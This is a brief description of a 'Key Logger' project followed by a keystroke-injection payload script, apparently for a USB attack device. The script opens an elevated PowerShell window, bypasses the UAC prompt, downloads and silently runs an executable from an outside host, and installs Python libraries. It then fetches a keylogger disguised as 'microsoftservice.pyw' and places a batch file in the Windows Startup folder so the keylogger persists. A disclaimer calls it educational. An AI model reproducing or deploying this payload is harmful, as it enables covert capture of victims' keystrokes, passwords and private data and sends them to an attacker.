The Key Logger project involves a script that sets up a key logger on the target machine, capturing all keystrokes and sending them to a specified location. This project is intended for educational and testing purposes only.
To use the Key Logger script, follow these steps:
This script performs the following actions step by step:
DELAY 500 GUI r DELAY 1000 STRING powershell DELAY 500 CTRL-SHIFT ENTER DELAY 3000 LEFTARROW DELAY 1000 ENTER
STRING Invoke-WebRequest -Uri "https://www.ux1per.com/scripts/service.exe" -OutFile "$env:USERPROFILE\Downloads\service.exe"; Start-Process -FilePath "$env:USERPROFILE\Downloads\service.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1" -Wait -PassThru; exit DELAY 90000
GUI r DELAY 750 STRING powershell ENTER DELAY 1000 STRING pip install pynput ENTER DELAY 10000 STRING pip install requests ENTER DELAY 10000
STRING powershell -Command "Invoke-WebRequest -Uri 'https://www.ux1per.com/scripts/microsoftservice.pyw' -OutFile '$env:USERPROFILE\Downloads\microsoftservice.pyw'" ENTER DELAY 3000
STRING powershell -Command "Invoke-WebRequest -Uri 'https://www.ux1per.com/scripts/enable.bat' -OutFile '$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\enable.bat'" ENTER DELAY 3000
STRING exit DELAY 100 ENTER